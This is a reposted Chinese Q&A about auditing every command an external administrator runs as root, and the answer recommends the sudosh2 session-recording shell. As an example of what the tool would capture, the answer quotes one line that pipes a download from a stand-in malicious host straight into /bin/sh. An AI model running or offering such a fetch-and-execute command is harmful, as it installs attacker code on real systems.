security – 记录从root执行的每个命令

前端之家收集整理的这篇文章主要介绍了security – 记录从root执行的每个命令前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。
我想让我的根服务器访问外部系统管理员,但我想确保仔细检查他对我的服务器做了什么,例如复制数据,我不希望他们这样做,等等.我还想跟踪所访问的任何文件,即使是只读和未编辑.

我怎样才能做到这一点?

解决方法

信任但要验证!

查看sudosh2. sudosh2由FreeBSD端口提供.软件包可用于RedHat和Ubuntu.以下是他们网站的描述:

sudosh is an auditing shell filter and can be used as a login shell.
Sudosh records all keystrokes and output and can play back the session
as just like a VCR.

Sudosh将允许您重播用户的会话,这将允许您在用户看到它时查看所有输入和输出.你会看到一切,击键,拼写错误,退格,他们在vi中编辑的内容,wget的输出-O- http://zyxzyxzyxzyx.ru/haxor/malware | / bin / sh等

可以将sudosh日志发送到syslog,以便它们可以存储在远离系统的中央syslog服务器上.

请注意,sudosh2是sudosh的替代品,被其作者遗弃

您是否在用户坚持拥有超级用户权限的学术机构工作?或者您是在公司工作并希望允许用户在自己的VM上拥有超级用户权限?这可能是您的解决方案.

猜你在找的Linux相关文章